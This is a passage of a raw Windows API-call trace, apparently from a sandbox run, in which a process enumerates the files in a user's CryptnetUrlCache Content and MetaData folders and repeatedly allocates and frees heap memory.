ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0196.588] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0196.589] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0196.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0196.589] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xaeb57250, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0196.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C0018BB1B5834735BFA60CD063B31956") returned="" [0196.589] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0196.589] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0196.589] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0196.589] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.590] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.590] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.590] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.591] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.591] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.592] PathFindFileNameW (pszPath="") returned="" [0196.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.592] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.594] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.594] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.594] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x6c7fca30, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0196.594] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.595] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0196.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.595] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0196.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.595] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.595] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.596] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37C951188967C8EB88D99893D9D191FE") returned="" [0196.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.596] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf78620, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0196.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.596] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0196.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.597] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf524c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.597] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0196.597] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.597] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0196.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.598] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0196.598] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.598] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x2948f970, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0196.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.599] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0196.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.599] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0196.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.599] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0196.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.600] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0196.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.600] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0196.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.601] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0196.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.601] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C0018BB1B5834735BFA60CD063B31956") returned="" [0196.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.601] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0196.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.602] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0196.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.602] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0196.602] FindClose (in: hFindFile=0x2cbfa90 | out: hFindFile=0x2cbfa90) returned 1 [0196.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ed50 | out: hHeap=0x6a0000) returned 1 [0196.605] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0196.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ed50 [0196.605] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0196.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2dc80 [0196.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | 